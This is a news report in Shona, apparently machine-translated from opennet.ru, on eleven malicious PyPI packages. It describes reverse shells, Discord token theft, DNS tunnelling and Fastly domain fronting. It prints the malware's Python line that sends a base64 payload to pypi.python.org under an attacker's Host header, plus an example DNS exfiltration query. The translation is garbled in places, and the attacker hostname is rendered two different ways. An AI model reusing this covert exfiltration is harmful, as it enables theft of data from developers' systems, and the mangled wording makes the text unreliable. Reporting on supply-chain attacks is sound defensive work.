MuPyPI (Python Package Index) dhairekitori, 11 mapakeji ane kodhi yakaipa akaonekwa. Matambudziko asati aonekwa, mapakeji akange atorwa zvakapetwa kanosvika zviuru makumi matatu nemasere. Iwo akaonekwa mapakeji ane hutsinye akakosha pakushandisa kwawo nzira dzakaomarara kuvanza nzira dzekutaurirana nemaseva evanorwisa.
- importantpackage (6305 downloads), yakakosha-package (12897) - yakamisa chinongedzo kune yekunze sevha pasi pechiratidziro chekubatanidza kune pypi.python.org kupa ganda kupinda kune system (reverse shell) uye yakashandisa trevorc2 chirongwa kuvanza iyo nzira yekukurukurirana.
- pptest (10001), ipboards (946) - yakashandisa DNS senzira yekutaurirana kuendesa ruzivo nezve system (mune yekutanga packet zita remuenzi, dhairekitori rekushanda, yemukati nekunze IP, mune yechipiri - zita remushandisi uye zita remuenzi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - yakaratidza Discord service tokeni musystem ndokuitumira kune wekunze.
- trrfab (287) - yakatumira identifier, zita remuenzi uye zviri mukati me /etc/passwd, /etc/hosts,/home kune wekunze muenzi.
- 10Cent10 (490) - yakamisa reverse shell yekubatanidza neyekunze muenzi.
- yandex-yt (4183) - yakaratidza meseji nezve system iri kukanganisa uye inotungamirwa kune peji ine rumwe ruzivo nezve zvimwe zviito zvakaburitswa kuburikidza nda.ya.ru (api.ya.cc).
Kunyanya kucherechedzwa inzira yekuwana ekunze mauto anoshandiswa mupakeji yakakosha uye yakakosha-pakeji mapakeji, ayo akashandisa iyo Fastly content delivery network inoshandiswa muPyPI directory kuvanza basa ravo. Muchokwadi, zvikumbiro zvakatumirwa kune pypi.python.org sevha (kusanganisira kutsanangura zita rekuti python.org muSNI mukati mekukumbira kweHTTPS), asi iyo HTTP "Host" musoro waisanganisira zita revhavha inodzorwa nevanorwisa (sec. mberi.io. global.prod.fastly.net). Iyo yemukati yekutumira network yakatumira chikumbiro chakafanana kune inorwisa sevha, ichishandisa maparamita eiyo TLS yekubatanidza kune pypi.python.org kana uchitumira data.
Iyo PyPI zvivakwa zvinofambiswa neiyo Fastly content delivery network, iyo inoshandisa iyo Varnish transparent proxy kucache zvakajairwa zvikumbiro, uye zvakare inoshandisa TLS chitupa kugadzirisa padanho reCDN, pane kumagumo maseva, kuendesa zvikumbiro zveHTTPS kuburikidza neproxy. Pasinei neanotariswa, zvikumbiro zvinotumirwa kune proxy, iyo inosarudza mugadziri anodiwa achishandisa HTTP "Host" musoro, uye mazita ezita rezita akasungirirwa kuCDN load balancer IP kero dzinojairwa kune vese Fastly vatengi.
Sevha yevanorwisa inonyoresawo neCDN Nekukurumidza, iyo inopa zvirongwa zvemahara kumunhu wese uye inobvumira kusazivikanwa kunyoreswa. Zvinokosha kucherechedza kuti kutumira zvikumbiro kune akabatwa pakugadzira "reverse shell", chirongwa chinoshandiswawo, asi chinotangwa kubva kudivi reanorwisa. Kubva kunze, kudyidzana nevanorwisa sevha inotaridzika sechikamu chiri pamutemo neiyo PyPI dhairekitori, yakavharidzirwa uchishandisa PyPI TLS chitupa. Imwe nzira yakafanana, inozivikanwa se "domain fronting," yakamboshandiswa zvakasimba kuvanza zita remuenzi kana ichipfuura ichivharira, uchishandisa kugona kwakapihwa mune mamwe maCDN network kuti uwane HTTPS nekuratidza munhu anonyepedzera muSNI uye achinyatso tumira zita reiyo. akakumbira mugamuchiri muHTTP Host musoro mukati mechikamu cheTLS.
Kuvanza kuita kwakashata, TrevorC2 package yaishandiswawo kuita kudyidzana nesevha yakafanana neyakajairwa pawebhu navigation, semuenzaniso, zvikumbiro zvakashata zvakatumirwa pasi pekudhawunirodha mufananidzo "https://pypi.python.org/images/ guid=β neruzivo encoding muguid parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Iwo pptest uye ipboards mapakeji akashandisa imwe nzira yekuvanza network chiitiko, zvichibva pakukodha ruzivo runobatsira mumibvunzo kune DNS server. Iyo malware inotumira ruzivo nekuita zvikumbiro zveDNS senge "nu4timjagq4fimbuhe.example.com", umo iyo data inotumirwa kune control server inovharirwa uchishandisa iyo base64 fomati mune subdomain zita. Anorwisa anogamuchira aya mameseji nekudzora iyo DNS server yeiyo example.com domain.
Source: opennet.ru